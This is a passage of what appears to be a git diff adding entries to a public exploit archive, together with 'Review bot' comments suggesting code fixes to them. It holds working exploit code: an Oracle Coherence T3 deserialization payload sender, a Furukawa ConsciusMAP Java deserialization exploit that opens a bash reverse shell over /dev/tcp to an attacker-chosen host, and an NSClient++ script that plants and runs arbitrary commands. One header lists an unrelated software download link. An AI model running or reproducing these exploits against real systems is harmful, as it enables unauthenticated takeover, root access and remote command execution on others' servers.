\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' +payload=payload+payloadObj 
+payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x
54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' + +payload=struct.pack('>I',len(payload)) + payload[4:] + +print '[+] Sending payload...' +sock.send(payload) +data = sock.recv(1024) +print >>sys.stderr, 'received "%s"' % data + + +[Vendor] +Oracle + + +[Vulnerability Type] +Network Remote + + + +[Description] +Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). +Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. +Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. +Successful attacks of this vulnerability can result in takeover of Oracle Coherence. +CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 
+ + +[Disclosure Timeline] +2019/12/10 + + +[+] Disclaimer +The entry creation date may reflect when the CVE ID was allocated or reserved, +and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. + +[Video] +https://www.youtube.com/watch?v=59jt8rr8ECc + +@nu11secur1ty + +-- + +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt new file mode 100644 index 000000000..6bc0a0374 --- /dev/null +++ b/exploits/java/webapps/48380.txt 
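Review bot: The file is committed as `48320.py`, but lines such as `[+] Credits: Ventsislav Varbanovski (nu11secur1ty)`, `[Exploit Program Code]` and the trailing `[Vendor]` / `[Description]` / `[Disclosure Timeline]` sections are bare prose, so the file does not parse as Python; either prefix them with `#` or store the entry as `.txt` like the neighbouring advisories. The code itself is Python 2 (`print 'Usage: ...'`, `print >>sys.stderr, ...`) while the shebang `#!/usr/bin/python` does not say so; a `# Python 2 only` comment beside the shebang would save readers a failed run. The socket and the handle from `open(sys.argv[3],'rb').read()` are never closed.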
@@ -0,0 +1,338 @@ +# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution +# Date: 2020-04-24 +# Vendor Homepage: https://www.tecnoredsa.com.ar +# Exploit Authors: LiquidWorm +# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe +# Version: 2.8.1 +# CVE : N/A + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution +# +# +# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA +# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar +# Affected version: APROS Evolution | 2.8.1 +# FURUKAWA | 2.7.10 +# ConsciusMAP | 2.6.4 +# | 2.3.1 +# | 2.1.49 +# | 2.1.36 +# | 2.1.31 +# | 2.1.18 +# | 2.1.16 +# | 2.1.15 +# | 2.1.1 +# | 2.0.1174 +# | 1.8 +# | 1.4.70 +# +# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored +# provisioning system for FTTH networks. Complete administration of +# your entire external FTTH network plant, including from the ONUs +# installed in each end customer, to the wiring and junction boxes. +# Unify all the management of your FTTH network on a single platform. +# Unify all your data, whether from customers, your network, or the +# external plant in one place. APROS FTTH allows you to manage your +# entire FTTH network in a simple and globalized way with just one +# click, without being a network expert. Includes services such as: +# bandwidth limitation, Turbo Internet for time plans, BURST Internet, +# QinQ for companies, and many more. General consumption graphics and +# per customer in real time. Captive Portal for cutting or suspension +# of the service. +# +# Desc: The FTTH provisioning solution suffers from an unauthenticated +# remote code execution vulnerability due to an unsafe deserialization +# of Java objects (ViewState) triggered via the 'javax.faces.ViewState' +# HTTP POST parameter. 
The deserialization can cause the vulnerable JSF +# web application to execute arbitrary Java functions, malicious Java +# bytecode, and system shell commands with root privileges. +# +# =================================================================== +# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444 +# [*] Setting up valid URL path +# [*] Starting callback listener child thread +# [*] Starting handler on port 4444 +# [*] Sending serialized object +# [*] Connection from 172.16.0.1:48446 +# [*] You got shell! +# tomcat7@zslab:/var/lib/tomcat7$ id +# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa) +# tomcat7@zslab:/var/lib/tomcat7$ sudo su +# id +# uid=0(root) gid=0(root) grupos=0(root) +# exit +# tomcat7@zslab:/var/lib/tomcat7$ exit +# *** Connection closed by remote host *** +# =================================================================== +# +# Tested on: Apache Tomcat/7.0.68 +# Apache Tomcat/7.0.52 +# Apache MyFaces/2.2.1 +# Apache MyFaces/2.1.17 +# Apache MyFaces/2.0.10 +# GNU/Linux 4.4.0-173 +# GNU/Linux 4.4.0-137 +# GNU/Linux 4.4.0-101 +# GNU/Linux 4.4.0-83 +# GNU/Linux 3.15.0 +# GNU/Linux 3.13.0-32 +# PrimeFaces/4.0.RC1 +# Apache-Coyote/1.1 +# ACC Library 3.1 +# Ubuntu 16.04.2 +# Ubuntu 14.04.2 +# Java/1.8.0_242 +# Java/1.8.0_181 +# Java/1.8.0_131 +# Java/1.7.0_79 +# MySQL 5.7.29 +# MySQL 5.7.18 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2020-5565 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php +# +# CVE ID: CVE-2020-12133 +# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133 +# +# +# 24.02.2020 +# + +import os############# +import sys############ +import gzip#######o### +import zlib########### +import socket######### +import base64######### +import urllib######### +import requests####### +import 
telnetlib###### +import threading###### +import subprocess##### + +from io import BytesIO +from time import sleep +from flash import blic + +class Optics: + + def __init__(self): + self.callback = None# + self.headers = None## + self.payload = None## + self.target = None### + self.lport = None#### + self.path = None##### + self.cmd = None###### + + def allears(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(8) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] Probably not vulnerable... ({poraka})".format(poraka=p)) + print("[+] Check your port mappings.") + s.close() + exit(0) + break + + print("[*] You got shell!") + + # + # UnicodeDecodeError dirty fix: + # /usr/lib/python3.6/telnetlib.py + # Change from 'ascii' to 'utf-8' (Lines: 553 and 556) + # + + telnetus.interact() + conn.close() + + def thricer(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.allears) + konac.start() + sleep(1) + self.gadget() + + def gadget(self): + self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/" + self.cmd += self.callback + self.cmd += "/" + self.cmd += str(self.lport) + self.cmd += "<&1" + + payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C" + payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03" + payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00" + payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63" + payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E" + payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61" + payload += 
b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02" + payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61" + payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74" + payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B" + payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68" + payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66" + payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E" + payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F" + payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A" + payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00" + payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61" + payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C" + payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72" + payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61" + payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65" + payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43" + payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72" + payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F" + payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72" + payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E" + payload += 
b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73" + payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00" + payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70" + payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C" + payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D" + payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69" + payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72" + payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69" + payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72" + payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D" + payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66" + payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72" + payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38" + payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A" + payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C" + payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C" + payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B" + payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12" + payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73" + payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E" + payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C" + payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75" + payload += 
b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C" + payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A" + payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D" + payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E" + payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00" + payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69" + payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72" + payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63" + payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00" + payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2" + payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################" + payload += (bytes(self.cmd, "utf-8"))############################################" + payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01" + payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61" + payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2" + payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65" + payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D" + payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00" + payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E" + payload += 
b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00" + payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09" + payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00" + payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######" + + jbits = BytesIO() + with gzip.GzipFile(fileobj=jbits, mode="wb") as f: + f.write(payload) + serialize = base64.b64encode(jbits.getvalue()) + print("[*] Sending serialized object") + + self.headers = { + "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn", + "Content-Type" : "application/x-www-form-urlencoded", + "User-Agent" : "ISP-Eye/2.51", + "Connection" : "keep-alive"} + + self.paramz={"javax.faces.ViewState" : serialize} + #sleep(1) + r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz) + + def par(self): + if len(sys.argv) != 4: + self.usage() + else: + self.target = sys.argv[1] + self.callback = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.target: + self.target = "http://{}".format(self.target) + + def check(self): + print("[*] Setting up valid URL path") + try: + r = requests.get(self.target) + app = r.text + if not "FURUKAWA" in app and not "APROS" in app: + print("[!] App not detected.") + exit(0) + if "FURUKAWA" in app: + self.path = "/FURUKAWA/" + elif "APROS" in app: + self.path = "/APROS/" + else: + exit(-1337) + except Exception as p: + print("[!] 
Somethingz wrong: \n--\n{poraka}".format(poraka=p)) + exit(0) + + def framed(self): + naslov = """ + o===--------------------------------------===o + | | + | Furukawa Electric / Tecnored | + | APROS Evolution | FURUKAWA | ConsciusMAP | + | Fiber-To-The-Home (FTTH) | + | | + | Java Deserialization Remote Code Execution | + | ZSL-2020-5565 | + | | + o===--------------------------------------===o + || + || + (\__/)|| + (•ㅅ•)|| + / づ| + """ + print(naslov) + + def usage(self): + self.framed() + print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>") + print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n") + exit(0) + + def main(self): + self.par()########() + self.check()######() + self.thricer()####() + +if __name__ == '__main__': + Optics().main() \ No newline at end of file diff --git a/exploits/json/webapps/48360.txt b/exploits/json/webapps/48360.txt new file mode 100644 index 000000000..93eebe24e --- /dev/null +++ b/exploits/json/webapps/48360.txt 
@@ -0,0 +1,192 @@ +# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-04-20 +# Exploit Author: kindredsec +# Vendor Homepage: https://nsclient.org/ +# Software Link: https://nsclient.org/download/ +# Version: 0.5.2.35 +# Tested on: Microsoft Windows 10 Pro (x64) +# CVE: N/A +# +# NSClient++ is a monitoring agent that has the option to run external scripts. +# This feature can allow an attacker, given they have credentials, the ability to execute +# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt +# Default, this leads to privileged code execution. + +#!/usr/bin/env python3 + +import requests +from bs4 import BeautifulSoup as bs +import urllib3 +import json +import sys +import random +import string +import time +import argparse +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def generateName(): + + letters = string.ascii_lowercase + string.ascii_uppercase + return ''.join(random.choice(letters) for i in range(random.randint(8,13))) + +def printStatus(message, msg_type): + + C_YELLOW = '\033[1;33m' + C_RESET = '\033[0m' + C_GREEN = '\033[1;32m' + C_RED = '\033[1;31m' + + if msg_type == "good": + green_plus = C_GREEN + "[+]" + C_RESET + string = green_plus + " " + message + + elif msg_type == "info": + yellow_ex = C_YELLOW + "[!]" + C_RESET + string = yellow_ex + " " + message + + elif msg_type == "bad": + red_minus = C_RED + "[-]" + C_RESET + string = red_minus + " " + message + + print(string) + + +# This function adds a new external script containing the desired +# command, then saves the configuration +def configurePayload(session, cmd, key): + + printStatus("Configuring Script with Specified Payload . . 
.", "info") + endpoint = "/settings/query.json" + node = { "path" : "/settings/external scripts/scripts", + "key" : key } + value = { "string_data" : cmd } + update = { "node" : node , "value" : value } + payload = [ { "plugin_id" : "1234", + "update" : update } ] + json_data = { "type" : "SettingsRequestMessage", "payload" : payload } + + out = session.post(url = base_url + endpoint, json=json_data, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") + sys.exit(1) + + printStatus("Added External Script (name: " + key + ")", "good") + time.sleep(3) + printStatus("Saving Configuration . . .", "info") + header = { "version" : "1" } + payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] + json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } + + session.post(url = base_url + endpoint, json=json_data, verify=False) + + +# Since the application needs to be restarted after making changes, +# this function reloads the application, and waits for it to come back. +def reloadConfig(session): + + printStatus("Reloading Application . . .", "info") + endpoint = "/core/reload" + session.get(url = base_url + endpoint, verify=False) + + # Wait until the application successfully reloads by making a request + # every 10 seconds until it responds. + printStatus("Waiting for Application to reload . . .", "info") + time.sleep(10) + response = False + count = 0 + while not response: + try: + out = session.get(url = base_url, verify=False, timeout=10) + if len(out.content) > 0: + response = True + except: + count += 1 + if count > 10: + printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") + sys.exit(1) + else: + continue + + +# This function makes the call to the new external script to +# ultimately execute the code. +def triggerPayload(session, key): + + printStatus("Triggering payload, should execute shortly . . 
.", "info") + endpoint = "/query/" + key + try: + session.get(url = base_url + endpoint, verify=False, timeout=10) + except requests.exceptions.ReadTimeout: + printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") + sys.exit(0) + + +# Before setting up the exploit, this function makes sure the +# required feature (External Scripts) is enabled on the application. +def enableFeature(session): + + printStatus("Enabling External Scripts Module . . .", "info") + endpoint = "/registry/control/module/load" + params = { "name" : "CheckExternalScripts" } + out = session.get(url = base_url + endpoint, params=params, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") + sys.exit(1) + + +# This function obtains an authentication token that gets added to all +# remaining headers. +def getAuthToken(session): + + printStatus("Obtaining Authentication Token . . .", "info") + endpoint = "/auth/token" + params = { "password" : password } + auth = session.get(url = base_url + endpoint, params=params, verify=False) + if "auth token" in str(auth.content): + j = json.loads(auth.content) + authToken = j["auth token"] + printStatus("Got auth token: " + authToken, "good") + return authToken + else: + printStatus("Error obtaining auth token, is your password correct? 
Hit error at: " + endpoint, "bad") + sys.exit(1) + + + +parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") +parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') +parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') +parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') +parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') +args = parser.parse_args() + +if len(sys.argv) < 4: + parser.print_help() + sys.exit(1) + +# Build base URL, grab needed arguments +base_url = "https://" + args.t + ":" + args.P +printStatus("Targeting base URL " + base_url, "info") +password = args.p +cmd = args.c + +# Get first auth token, and add it to headers of session +s = requests.session() +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Generate a random name, enable the feature, add the payload, +# then reload. +randKey = generateName() +enableFeature(s) +configurePayload(s, cmd, randKey) +reloadConfig(s) + +# Since application was reloaded, need a new auth token. +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Execute our code. +triggerPayload(s, randKey) \ No newline at end of file diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py new file mode 100755 index 000000000..aa6146124 --- /dev/null +++ b/exploits/linux/dos/48301.py 
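Review bot: The bare `except:` in reloadConfig's polling loop swallows every exception, including KeyboardInterrupt and SystemExit, so Ctrl-C cannot stop the wait and any non-network bug is silently counted as "not up yet"; narrow it to `except requests.exceptions.RequestException:`. The `if len(sys.argv) < 4` guard after argparse does not guarantee that all four options were given, because each is declared with `nargs='?'`; `required=True` on the four add_argument calls, or a check that `args.t`, `args.P`, `args.p` and `args.c` are not None, would report the problem instead of a TypeError from the string concatenation that builds `base_url`. In printStatus the local `string = ...` shadows the `string` module imported at the top of the file; a name such as `line` avoids the confusion. The header could also note the persistent artefact the script leaves behind — the external-script entry saved under `/settings/external 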